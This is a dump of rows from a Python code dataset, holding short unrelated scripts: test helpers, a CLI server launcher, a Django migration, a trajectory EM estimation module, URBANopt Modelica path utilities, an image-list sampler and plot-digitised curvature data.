| content | origin | type |
|---|---|---|
| stringlengths 0–1.05M | stringclasses 2 values | stringclasses 2 values |
import os, sys, inspect
# realpath() resolves symlinks, so the script still finds its own folder even when invoked via a symlink
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"subfolder")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
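# A minimal sketch of how the path tweak pays off, assuming a module named
# "helpers.py" exists inside "subfolder" (both names are hypothetical):
#
#     import helpers          # resolvable because cmd_subfolder is on sys.path
#     helpers.do_something()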
|
nilq/baby-python
|
python
|
from Core.Anlyst import anlyse
from Core.URLs import WayUrl
from Core.URLs import WebUrl
from Test.NetWorkTest import WebUrlPostTest
from Core.NetWork import VisitorWays
from Core.NetWork import visit
xpaths = ['//*[@id="form3"]/a/@href']
selector = '#form3 > a'
def TestOfAnlyseByRegex():
url = "regex://a/b0"
rep = getText().text
anlyse(url,rep)
def TestOfAnlseByWayUrl():
wayurl = WayUrl.WayUrlBuilder().addModel("xPath").build()
anlyse(wayurl)
def getText():
return WebUrlPostTest()
def TestOfXPath():
url = WayUrl.WayUrlBuilder().addModel("xpath").\
addWays(xpaths[0]).build()
rep = getText()
res = anlyse(url,rep.text)
print(res)
def TestOfDOM():
rep = getText().text
# print(url)
url = WayUrl.WayUrlBuilder().\
addModel("DOM").\
addWays(selector).\
build()
print(url)
x = anlyse(url,rep)
for item in x:
print(item.string)
print(x)
def TestOfJson():
weburl = WebUrl.WebUrlBuilder().addHost("https://yz.chsi.com.cn/zsml/pages/getSs.jsp").build()
rep = visit(weburl,VisitorWays.POST,dict(),dict())
rep.encoding = rep.apparent_encoding
wayurl = WayUrl.WayUrlBuilder().addModel("JSON").build()
res = anlyse(wayurl,rep.text)
print(res)
if __name__ == '__main__':
TestOfAnlyseByRegex()
TestOfXPath()
TestOfDOM()
TestOfJson()
pass
|
nilq/baby-python
|
python
|
import click
from cortex.server import server
from cortex.utils import logging
# ----=========== CLI ===========----
@click.group()
def cli():
pass
@cli.command("run-server")
@click.option("--host", "-h")
@click.option("--port", "-p", type=int)
@click.argument('publish_url')
def run_server_cli(host, port, publish_url):
with logging.log_exception(logging.get_module_logger(__file__), to_suppress=(Exception,)):
server.run_server_with_url(host or "127.0.0.1", port or 8080, publish_url)
if __name__ == "__main__":
cli()
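# Hypothetical invocation sketch (host, port, and publish URL are placeholders):
#
#     python thisfile.py run-server --host 0.0.0.0 --port 8080 tcp://127.0.0.1:5005
#
# Omitting --host/--port falls back to 127.0.0.1:8080 via the `or` defaults above.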
|
nilq/baby-python
|
python
|
"""
Account base class for holding Account information
"""
class Account:
    def __init__(self, employee_id: int = 0, user_name: str = "", password: str = ""):
        # Assign real attributes; bare annotations alone would only declare
        # types without creating them on the instance.
        self.employee_id = employee_id
        self.user_name = user_name
        self.password = password
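# A quick usage sketch (hypothetical values) confirming the attributes exist:
#
#     acct = Account(employee_id=1, user_name="jdoe", password="secret")
#     assert acct.user_name == "jdoe"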
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('category', models.CharField(max_length=16, choices=[(b'CRIME', b'Crime'), (b'HISTORY', b'History'), (b'HORROR', b'Horror'), (b'SCIFI', b'Sci-fi')])),
],
),
]
|
nilq/baby-python
|
python
|
import typing as T
from dataclasses import dataclass
from moonleap import Resource
from titan.project_pkg.service import Tool
@dataclass
class SetupFile(Tool):
pass
@dataclass
class SetupFileConfig(Resource):
body: T.Union[dict, T.Callable]
def get_body(self):
return self.body() if callable(self.body) else self.body
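# A minimal sketch of the two accepted body forms, assuming SetupFileConfig
# can be constructed directly with a `body` argument:
#
#     static_cfg = SetupFileConfig(body={"name": "pkg"})
#     lazy_cfg = SetupFileConfig(body=lambda: {"name": "pkg"})
#     assert static_cfg.get_body() == lazy_cfg.get_body()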
|
nilq/baby-python
|
python
|
import numpy as np
from utils.tt_dataset import AgentType, TrajectoryTypeDataset
from test_problems.u_grid_encoding import xy2mrx_v1 as xy2mrx
from test_problems.risk_distances import dist2rt_v1 as dist2rt
from test_problems.grid_encoding import rt2enc_v1 as rt2enc
from utils import general as ge
import scipy.optimize as opt
def estimate_x_unobs(dataset):
# use \hat{x} as unbiased estimate
for df_info in dataset.df_list:
df = df_info.df
        mask = ~df.is_obs & (df.type_id == AgentType.ped)  # parentheses required: & binds tighter than ==
df.loc[mask, ['sm_x', 'sm_y']] = df.loc[mask, ['x', 'y']].values
def set_vic_sm_cv(dataset, dt):
"""
Set sm_[x y vx vy] for vic
Velocity via constant velocity (from last)
assume observations are continuous
:param dataset: exist [frame_id(index) agent_id type_id x y
sm_x sm_y sm_vx sm_vy]
:param dt:
:return:
"""
for df_info in dataset.df_list:
df = df_info.df
vic_ids = df.loc[df.type_id == AgentType.vic, 'agent_id'].unique()
for vic_id in vic_ids:
vic_df = df.loc[df.agent_id == vic_id]
v = (vic_df[['x', 'y']].values[1:] -
vic_df[['x', 'y']].values[:-1]) / dt
v = np.vstack((v, v[-1, :]))
df.loc[df.agent_id == vic_id, ['sm_vx', 'sm_vy']] = v
df.loc[df.agent_id == vic_id, ['sm_x', 'sm_y']] =\
vic_df[['x', 'y']].values
class DataframeInds:
"""
For later reassigning vector's values as
df.loc[frame_id in frames &
agent_id == agent_id, 'q'] = q[q_inds]
"""
def __init__(self, n_q_offset=0):
self.frames_list = []
self.agent_ids = []
self.q_inds_list = []
self._n_q = n_q_offset
def append(self, frames, agent_id, q_inds, is_relative=False):
self.frames_list.append(frames)
self.agent_ids.append(agent_id)
add_inds = q_inds
if is_relative:
add_inds = add_inds + self._n_q
self.q_inds_list.append(add_inds)
self._n_q += len(q_inds)
def get_offset(self):
return self._n_q
def __len__(self):
return len(self.frames_list)
def make_unobs_design_matrices(dataset, dt, mrx_grid, rt_grid):
"""
    for the data term:
        \lVert [q \otimes (1 \\ 1)] \circ v +
            [(1-q) \otimes (1 \\ 1)] \circ v \circ (Au) -
            \hat{v} \rVert_2^2
    so A = (... \\ m_{r_t}(x_t) \\ ...) \otimes (1 \\ 1),
    i.e. the matrix that picks out which u are 'active' during this 'slowing' timestep
    - order by [dataset.df_list, agent_id, frame_id]
    - assume ~is_obs => r >= 0
    :param dataset: [sm_(x y vx vy) set for all agents, r]
:param mrx_grid:
:param rt_grid:
:return:
"""
cols = ('sm_x', 'sm_y', 'sm_vx', 'sm_vy')
mrx_list = []
z_list = []
v_hat = []
v = []
df_id2inds = {}
n_q_offset = 0
for df_info in dataset.df_list:
df = df_info.df
df_inds = DataframeInds(n_q_offset=n_q_offset)
print('df unobs total 2: ', (~df['is_obs'].values).sum())
ped_ids = np.unique(df.loc[df.type_id == AgentType.ped, 'agent_id'].values)
for ped_id in ped_ids:
# set \hat{v} = x_next - x_prev / dt
ped_df = df.loc[df.agent_id == ped_id].copy()
ped_frames = ped_df.index.unique().values
ped_df['vh_x'] = np.nan
ped_df['vh_y'] = np.nan
ped_df.loc[ped_df.index[:-1], 'vh_x'] =\
(ped_df['x'].values[1:] - ped_df['x'].values[:-1]) / dt
ped_df.loc[ped_df.index[:-1], 'vh_y'] =\
(ped_df['y'].values[1:] - ped_df['y'].values[:-1]) / dt
unobs_ped_df = ped_df.loc[~ped_df.is_obs].iloc[:-1]
frames = unobs_ped_df.index.unique().values
if frames.size == 0:
# print('skipped')
continue
frame_ptns = ge.split_to_consecutive_v0(frames)
# single frames can have seq_r = [-1]
frame_ptns = [frame_ptn for frame_ptn in frame_ptns if len(frame_ptn) > 1]
if len(frame_ptns) == 0:
continue
seq_df_all = df.loc[ped_frames]
seq_df_all = seq_df_all.loc[(seq_df_all.agent_id == ped_id) |
(seq_df_all.type_id == AgentType.vic)]
frames_all = seq_df_all.index.unique().values
ped_pv_all, vic_pv_all = TrajectoryTypeDataset.build_nan_df(
seq_df_all, frames_all[0], frames_all.size, cols=cols)
for frame_ptn in frame_ptns:
# print(frame_ptn)
# seq_df = seq_df_all.loc[frame_ptn]
# print(seq_df.loc[seq_df.agent_id == ped_id, 'is_r_all'].values)
# print(seq_df.loc[seq_df.agent_id == ped_id, 'r'].values)
# print(seq_df.loc[seq_df.agent_id == ped_id, 'is_obs'].values)
# print(seq_df.loc[seq_df.agent_id == ped_id])
frames_all_inds = np.arange(frame_ptn.size) + int(frame_ptn[0] - frames_all[0])
                seq_r = seq_df_all.loc[seq_df_all.agent_id == ped_id, 'r']\
                    .values.astype(int)[frames_all_inds]  # np.int was removed in NumPy 1.24; use builtin int
assert np.all(seq_r >= 0), seq_r
# select via r -> n_frames, 4
vic_pv = vic_pv_all[frames_all_inds, seq_r, :]
ped_pv = ped_pv_all[frames_all_inds, 0, :]
frames_range = np.arange(frame_ptn.size)
mrx_rows = xy2mrx(ped_pv[:, :2], vic_pv, mrx_grid)
rt = dist2rt(ped_pv, vic_pv)
rt = np.log10(rt)
rt[:, :, 0] /= 2
z_rows = rt2enc(rt, rt_grid) # n_ped=n_frames, n_vic=n_frames, n_rt
z_rows = z_rows[frames_range, frames_range, :]
mrx_list.append(mrx_rows)
z_list.append(z_rows)
v_hat.append(unobs_ped_df.loc[frame_ptn, ['vh_x', 'vh_y']].values)
v.append(unobs_ped_df.loc[frame_ptn, ['sm_vx', 'sm_vy']].values)
df_inds.append(frame_ptn, ped_id, frames_range, is_relative=True)
if len(df_inds) > 0:
df_id2inds[df_info.datafile_path] = df_inds
n_q_offset = df_inds.get_offset()
mrx = np.vstack(mrx_list)
z = np.vstack(z_list)
z = np.hstack((1+0*z[:, [0]], z)) # constant
v_hat = np.vstack(v_hat).T.ravel(order='F')
v = np.vstack(v).T.ravel(order='F')
print(mrx.shape)
print(z.shape)
print(v_hat.shape)
return mrx, z, v_hat, v, df_id2inds
def estimate_u_beta_q_em(mrx, Z, v_hat, v, sigma_x, dt, n_iter=10):
q = initialize_q_em_v0(v_hat, v)
beta = ()
u = ()
precision_u = 1/20
precision_beta = 1/10
def f_obj(q_err_, u_, beta_):
mean_err = q_err_ + ((precision_u * u_) ** 2).sum() + \
((precision_beta * beta_) ** 2).sum()
return mean_err / q.size
for _ in range(n_iter):
u = u_given_q(q, mrx, v_hat, v, sigma_x, dt, precision_u)
beta = beta_given_q(q, Z, beta=beta, precision_beta=precision_beta)
q, q_err = q_given_u_beta(u, beta, mrx, v_hat, v, Z, sigma_x, dt)
print('f = {:.4f}'.format(f_obj(q_err, u, beta)))
return u, beta, q
def estimate_u_beta_q_em_v1(mrx, Z, v_hat, v, sigma_x, dt, n_iter=10):
q = initialize_q_em_v0(v_hat, v)
beta = ()
u = ()
precision_u = 1. #/20
precision_beta = 1/10
def f_obj(q_err_, u_, beta_):
        n_u = u_.size  # use the argument u_, not the enclosing-scope u
C = np.eye(n_u - 1) + np.diag(-np.ones(n_u - 2), k=-1)
bc = np.zeros(n_u - 1)
bc[0] = -u_[0]
mean_err = q_err_ + ((precision_beta * beta_) ** 2).sum() + \
(precision_u * np.linalg.norm(C.dot(u_[1:]) - bc))**2
return mean_err / q.size
for _ in range(n_iter):
u = u_given_q_v1(q, mrx, v_hat, v, sigma_x, dt, precision_u)
beta = beta_given_q(q, Z, beta=beta, precision_beta=precision_beta)
q, q_err = q_given_u_beta(u, beta, mrx, v_hat, v, Z, sigma_x, dt)
print('f = {:.4f}'.format(f_obj(q_err, u, beta)))
return u, beta, q
def initialize_q_em_v0(v_hat, v):
v_norm = np.linalg.norm(v.reshape(-1, 2), axis=1)
v_hat_norm = np.linalg.norm(v_hat.reshape(-1, 2), axis=1)
q = (v_hat_norm >= 0.2 * v_norm) * 1.
# q = (np.random.randn(q.size) > 0) * 1. # also works
return q
def u_given_q(q, mrx, v_hat, v, sigma_x, dt, precision_u):
"""
Estimate field parameters u
- st. -1 <= u <= 1
    \lVert (v \circ \{([1-q] \circ mrx) \otimes (1 \\ 1)\}) u -
        \hat{v} \circ ([1-q] \otimes (1 \\ 1)) \rVert_2^2 \cdot (dt^2)/(2\sigma_x^2)
:param q: n, |
:param mrx: n, n_u | design matrix for u grid
:param v_hat: 2n, | differenced velocities (may be slowing)
:param v: 2n, | actual desired velocities (estimated)
:param sigma_x:
:param dt:
:param precision_u:
:return:
u: n_u, |
"""
n_u = mrx.shape[1]
A = (mrx.T * (1-q)).T
A = np.repeat(A, 2, axis=0)
A = (A.T * v).T * dt / sigma_x
b = np.repeat((1-q), 2) * v_hat * dt / sigma_x
# res = np.linalg.lstsq(A, b, rcond=None)[0]
# add shrinkage + in case close ranges of u not seen
As = np.vstack((A, np.eye(n_u) * precision_u))
bs = np.hstack((b, np.zeros(n_u)))
u = np.linalg.lstsq(As, bs, rcond=None)[0]
if 1 < u.max():
print('1 < u_max, ', u.max())
if u.min() < -1:
print('u_min < -1, ', u.min())
np.clip(u, -1, 1, out=u)
return u
def u_given_q_v1(q, mrx, v_hat, v, sigma_x, dt, precision_u):
"""
Estimate field parameters u, setting close one to -1
- st. -1 <= u <= 1
- u_0 = -1
- ||Cu||_2^2 <=> each u_i close to u_{i+1}
ie add term (u has all but u_0)
Cu - b_c = (-u_1 \\ u_1-u_2 \\ ...) - (-u_0 \\ 0 \\ ...)
with u_0 = -1
- and A' = A[:, 1:], b' = b - u_0*A[:, 0]
    \lVert (v \circ \{([1-q] \circ mrx) \otimes (1 \\ 1)\}) u -
        \hat{v} \circ ([1-q] \otimes (1 \\ 1)) \rVert_2^2 \cdot (dt^2)/(2\sigma_x^2)
:param q: n, |
:param mrx: n, n_u | design matrix for u grid
:param v_hat: 2n, | differenced velocities (may be slowing)
:param v: 2n, | actual desired velocities (estimated)
:param sigma_x:
:param dt:
:param precision_u:
:return:
u: n_u, |
"""
n_u = mrx.shape[1]
A = (mrx.T * (1-q)).T
A = np.repeat(A, 2, axis=0)
A = (A.T * v).T * dt / sigma_x
b = np.repeat((1-q), 2) * v_hat * dt / sigma_x
u_0 = -1
C = np.eye(n_u-1) + np.diag(-np.ones(n_u-2), k=-1)
bc = np.zeros(n_u-1)
bc[0] = -u_0
As = np.vstack((A[:, 1:], C * precision_u))
bs = np.hstack((b - u_0 * A[:, 0], bc * precision_u))
u = np.linalg.lstsq(As, bs, rcond=None)[0]
u = np.hstack((u_0, u))
if 1 < u.max():
print('1 < u_max, ', u.max())
if u.min() < -1:
print('u_min < -1, ', u.min())
np.clip(u, -1, 1, out=u)
return u
def beta_given_q(q, Z, beta=(), precision_beta=0.):
# add very small shrinkage
    beta = beta if len(beta) > 0 else np.zeros((Z.shape[1],), dtype=float)  # np.float was removed in NumPy 1.24
res = opt.minimize(
lambda x: logistic_obj(x, q, Z).sum() + (x**2).sum() * precision_beta**2,
beta, method='BFGS')
beta = res.x
return beta
def logistic_obj(beta, q, Z):
"""
Calculate f_i for
f(beta) = 1/n sum_{i=1}^n f_i
with
f_i = -[q_i log(h_i) + (1-q_i) log(1-h_i)]
h_i = 1/(1 + exp{-beta'z_i})
:param beta: m,
:param q: n,
:param Z: n, m
:return:
"""
y = -Z.dot(beta)
# log_h = -np.log(1 + np.exp(y))
log_h = -np.logaddexp(0*y, y)
log_1mh = y + log_h
f = -(q * log_h + (1 - q) * log_1mh)
return f
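# Worked toy check of logistic_obj (illustrative values only): with beta = 0,
# every h_i = 0.5, so each f_i = -log(0.5) ~ 0.6931 regardless of q:
#
#     beta0 = np.zeros(2)
#     Z0 = np.array([[1., 0.], [1., 1.]])
#     q0 = np.array([1., 0.])
#     logistic_obj(beta0, q0, Z0)  # -> array([0.6931..., 0.6931...])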
def q_given_u_beta(u, beta, mrx, v_hat, v, Z, sigma_x, dt):
    q_ones = np.ones((Z.shape[0],), dtype=float)  # np.float was removed in NumPy 1.24
logistic_0 = logistic_obj(beta, 0*q_ones, Z)
logistic_1 = logistic_obj(beta, q_ones, Z)
A = np.repeat(mrx, 2, axis=0)
scaling = 0.5 * (dt / sigma_x) ** 2
l2_err_0 = ((v*(A.dot(u)) - v_hat).reshape(-1, 2) ** 2).sum(axis=1) * scaling
l2_err_1 = ((v - v_hat).reshape(-1, 2) ** 2).sum(axis=1) * scaling
q = (l2_err_1 + logistic_1 <= l2_err_0 + logistic_0) * 1.
q_err = (l2_err_1 + logistic_1) * q + (l2_err_0 + logistic_0) * (1-q)
return q, q_err.sum()
def set_q_estimates(dataset, df_id2inds, q):
for df_info in dataset.df_list:
df = df_info.df
df['q'] = np.nan
if df_info.datafile_path not in df_id2inds:
continue
df_inds = df_id2inds[df_info.datafile_path]
for i in range(len(df_inds)):
mask = (df.index.isin(df_inds.frames_list[i])) &\
(df.agent_id == df_inds.agent_ids[i])
df.loc[mask, 'q'] = q[df_inds.q_inds_list[i]]
|
nilq/baby-python
|
python
|
"""
****************************************************************************************************
:copyright (c) 2019-2021 URBANopt, Alliance for Sustainable Energy, LLC, and other contributors.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions
and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions
and the following disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the copyright holder nor the names of its contributors may be used to endorse
or promote products derived from this software without specific prior written permission.
Redistribution of this software, without modification, must refer to the software by the same
designation. Redistribution of a modified version of this software (i) may not refer to the
modified version by the same designation, or by any confusingly similar designation, and
(ii) must refer to the underlying software originally provided by Alliance as “URBANopt”. Except
to comply with the foregoing, the term “URBANopt”, or any confusingly similar designation may
not be used to refer to any modified version of this software or any modified version of the
underlying software originally provided by Alliance without the prior written consent of Alliance.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
****************************************************************************************************
"""
import logging
import os
import shutil
from uuid import uuid4
_log = logging.getLogger(__name__)
def copytree(src, dst, symlinks=False, ignore=None):
"""
Alternate version of copytree that will work if the directory already exists (use instead of shutil)
"""
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
shutil.copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
class ModelicaPath(object):
"""
Class for storing Modelica paths. This allows the path to point to
the model directory, resources, and scripts directory.
"""
def __init__(self, name, root_dir, overwrite=False):
"""
Create a new modelica-based path with name of 'name'
:param name: Name to create
"""
self.name = name
self.root_dir = root_dir
self.overwrite = overwrite
        # create the directories (the extra os.path.join wrappers were redundant)
        if root_dir is not None:
            self.clear_or_create_path(self.files_dir)
            self.clear_or_create_path(self.resources_dir)
            self.clear_or_create_path(self.scripts_dir)
def clear_or_create_path(self, path):
if os.path.exists(path):
if not self.overwrite:
raise Exception("Directory already exists and overwrite is false for %s" % path)
else:
shutil.rmtree(path)
os.makedirs(path, exist_ok=True)
@property
def files_dir(self):
"""
Return the path to the files (models) for the specified ModelicaPath. This path does not include the
trailing slash.
:return: string, path to where files (models) are stored, without trailing slash
"""
if self.root_dir is None:
return self.files_relative_dir
else:
return os.path.join(self.root_dir, self.name)
@property
def resources_relative_dir(self):
"""
Return the relative resource directory instead of the full path. This is useful when replacing
strings within modelica files which are relative to the package.
:return: string, relative resource's data path
"""
return os.path.join("Resources", "Data", self.name)
    @property
    def scripts_relative_dir(self):
        """Return the scripts directory that is in the resources directory. This only returns the
        relative directory and is useful when replacing string values within Modelica files.
        Note: a property cannot take arguments, so the platform is fixed to 'Dymola' here.
        :return: string, relative scripts path
        """
        return os.path.join("Resources", "Scripts", self.name, "Dymola")
@property
def files_relative_dir(self):
"""Return the path to the files relative to the project name."""
return os.path.join(self.name)
@property
def resources_dir(self):
"""
Return the path to the resources directory for the specified ModelicaPath. This path does not include
the trailing slash.
:return: string, path to where resources are stored, without trailing slash.
"""
if self.root_dir is None:
return self.resources_relative_dir
else:
return os.path.join(self.root_dir, self.resources_relative_dir)
@property
def scripts_dir(self):
"""
Return the path to the scripts directory (in the resources dir) for the specified ModelicaPath.
This path does not include the trailing slash.
:return: string, path to where scripts are stored, without trailing slash.
"""
if self.root_dir is None:
return self.scripts_relative_dir
else:
return os.path.join(self.root_dir, self.scripts_relative_dir)
def simple_uuid():
"""Generates a simple string uuid
:return: string, uuid
"""
return str(uuid4()).split("-")[0]
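# Usage sketch (assumes an empty, writable scratch directory):
#
#     mp = ModelicaPath("MyDistrict", root_dir="/tmp/modelica_demo", overwrite=True)
#     mp.resources_relative_dir   # -> "Resources/Data/MyDistrict"
#     simple_uuid()               # -> e.g. "3f2a1c4d" (first group of a UUID4)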
|
nilq/baby-python
|
python
|
"""
Generate training source and target domain records
"""
import os
import csv
import random
import argparse
def write_csv(path, lines):
with open(path, 'w') as f:
csv_writer = csv.writer(f, delimiter='\t')
for i, (p, l) in enumerate(lines):
csv_writer.writerow([i, l, p])
def read_image_list(image_list):
items = []
with open(image_list, 'r') as f:
for item in f:
p, l = item.split()
items.append((p, l))
return items
def sampling_images(items):
if args.m == 0 and args.n > 0:
# random shuffle
rng = random.Random(args.seed)
rng.shuffle(items)
return items[: min(args.n, len(items))], items[min(args.n, len(items)):]
elif args.m == 1 and args.n > 0:
# balanced sampling
rng = random.Random(args.seed)
cls = {}
for idx, (_, c) in enumerate(items):
if c in cls:
cls[c].append(idx)
else:
cls[c] = [idx]
n_cls = args.n // len(cls)
idx_selected = []
idx_unselected = []
# sampling
for k, v in cls.items():
rng.shuffle(v)
idx_selected.extend(v[: min(n_cls, len(v))])
idx_unselected.extend(v[min(n_cls, len(v)): ])
train_list = [items[i] for i in idx_selected]
test_list = [items[i] for i in idx_unselected]
rng.shuffle(train_list)
rng.shuffle(test_list)
return train_list, test_list
else:
rng = random.Random(args.seed)
rng.shuffle(items)
return items, []
def generate_list():
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
items = read_image_list(args.image_list)
train_items, test_items = sampling_images(items)
if len(train_items) > 0:
write_csv(os.path.join(args.out_dir, '%s-%d.lst' % (args.prefix, args.n)), train_items)
if len(test_items) > 0:
write_csv(os.path.join(args.out_dir, '%s-%d.lst' % (args.prefix, len(test_items))), test_items)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('image_list', help='image list')
parser.add_argument('prefix', help='prefix')
parser.add_argument('--m', type=int, default=1, help='sampling method')
parser.add_argument('--n', type=int, default=1200, help='sampling number')
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--out-dir', type=str, default='datasets/VisDA17')
args = parser.parse_args()
generate_list()
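# Hypothetical invocation sketch (script and list names are placeholders):
#
#     python generate_list.py train/image_list.txt visda-train --m 1 --n 1200 \
#         --out-dir datasets/VisDA17
#
# With --m 1 this draws a class-balanced sample of ~1200 images and writes the
# selected/unselected splits as tab-separated .lst files.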
|
nilq/baby-python
|
python
|
# Copyright (c) 2021 Valerii Sukhorukov. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------------------------
"""Functions extracting empitical length and curvature distributions.
Source publication:
Zhen Zhang Yukako Nishimura, and Pakorn Kanchanawonga 'Extracting
microtubule networks from superresolution single-molecule localization
microscopy data' MBoC, 2017.
"""
from collections import namedtuple
from typing import Sequence
Extent = namedtuple('Extent', ['begin', 'end'])  # typename now matches the alias
def curvature(density: bool) -> tuple[list, list[list]]:
"""Curvature data extracted from publication plots.
"""
pix = Extent(begin=[177, 900], end=[1195, 81])
val = Extent(begin=[0, 0], end=[1.5, 1])
# Blue:
contro_pix = [0, 696, 251, 81, 109, 232, 458, 591, 685, 738, 797, 822,
832, 852, 865, 871, 874, 887, 880, 891, 895, 894, 897, 895,
895, 895, 895, 895, 899, 900, 899]
# Red:
ca_ras_pix = [0, 702, 228, 81, 151, 164, 330, 527, 616, 711, 770, 808,
817, 799, 820, 830, 867, 881, 876, 886, 888, 899, 897, 886,
899, 895, 895, 899, 899, 900, 899]
return _process(pix, val, [contro_pix, ca_ras_pix],
start=1, density=density)
def length(density: bool) -> tuple[list, list[list]]:
"""Length data extracted from publication plots.
"""
pix = Extent(begin=[121, 873], end=[1000, 75])
val = Extent(begin=[0, 0], end=[20, 1])
# Green:
contro_pix = [0, 0, 441, 75, 201, 339, 425, 477, 493, 567, 615, 604,
652, 656, 676, 702, 714, 720, 740, 759, 742, 788, 800, 788,
801, 809, 809, 815, 829, 813, 833, 822, 848, 832, 846, 833,
858, 859, 854, 854, 858, 854, 858, 858, 858, 857, 864, 856,
855, 858, 861, 860, 863, 863, 863, 873, 864, 868, 868, 870]
# Red:
ca_ras_pix = [0, 0, 453, 75, 256, 372, 388, 453, 460, 548, 589, 632,
620, 651, 612, 724, 718, 701, 738, 772, 749, 755, 758, 804,
786, 830, 786, 799, 814, 827, 811, 800, 833, 837, 816, 820,
833, 833, 854, 852, 829, 843, 847, 847, 847, 857, 855, 865,
868, 872, 872, 851, 868, 863, 862, 868, 872, 857, 873, 865]
return _process(pix, val, [contro_pix, ca_ras_pix],
start=2, density=density)
def _process(
pix: Extent,
val: Extent,
data: Sequence[Sequence],
start: int = 0,
density: bool = False,
) -> tuple[list, list[list]]:
range_pix = [pix.end[0] - pix.begin[0],
pix.begin[1] - pix.end[1]]
range_val = [val.end[i] - val.begin[i] for i in range(2)]
scale = [range_val[i] / range_pix[i] for i in range(2)]
n = len(data[0])
bin_pix = range_pix[0] / n
bin_val = bin_pix * scale[0]
x = [i * bin_val for i in range(start, n)]
res = [[(pix.begin[1] - v) * scale[1] for v in d[start:]] for d in data]
    if density:
        # list comprehensions so the return matches tuple[list, list[list]]
        # (the original generator expressions could only be consumed once)
        s = [sum(r) for r in res]
        res = [[r / ss / bin_val for r in rr] for rr, ss in zip(res, s)]
    return x, res
def avg(
xx: Sequence,
yy: Sequence
) -> float:
"""Averages from frequency distribution.
"""
dx = xx[1] - xx[0]
a = sum(yy) * dx
yy = [y / a for y in yy]
return sum([x * y for x, y in zip(xx, yy)]) * dx
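# Worked check of avg on a tiny two-bin distribution (illustrative numbers):
# xx = [0, 1], yy = [1, 1] -> dx = 1, a = 2, normalized yy = [0.5, 0.5],
# so avg = (0*0.5 + 1*0.5) * 1 = 0.5, the midpoint as expected.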
if __name__ == '__main__':
as_density = True
x_curv, (control_curv, ca_ras_curv) = curvature(as_density)
control_curv_avg = avg(x_curv, control_curv)
x_leng, (control_leng, ca_ras_leng) = length(as_density)
control_leng_avg = avg(x_leng, control_leng)
|
nilq/baby-python
|
python
|
import cdat_info
import cdms2
import numpy
import unittest
import sys
from functools import reduce  # Python 3: reduce moved to functools
PLOT = False
if PLOT:
from matplotlib import pylab as pl
from mpl_toolkits.basemap import Basemap as bm
class TestTasRegrid(unittest.TestCase):
"""
All test interpolate to the same grid
"""
def setUp(self):
self.clt = cdms2.open(cdat_info.get_sampledata_path() + '/clt.nc')('clt')[0, ...]
self.tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ecm_1979.nc')('tas')[0, ...]
if PLOT:
lllat = self.clt.getLatitude()[:].min()
urlat = self.clt.getLatitude()[:].max()
lllon = self.clt.getLongitude()[:].min()
urlon = self.clt.getLongitude()[:].max()
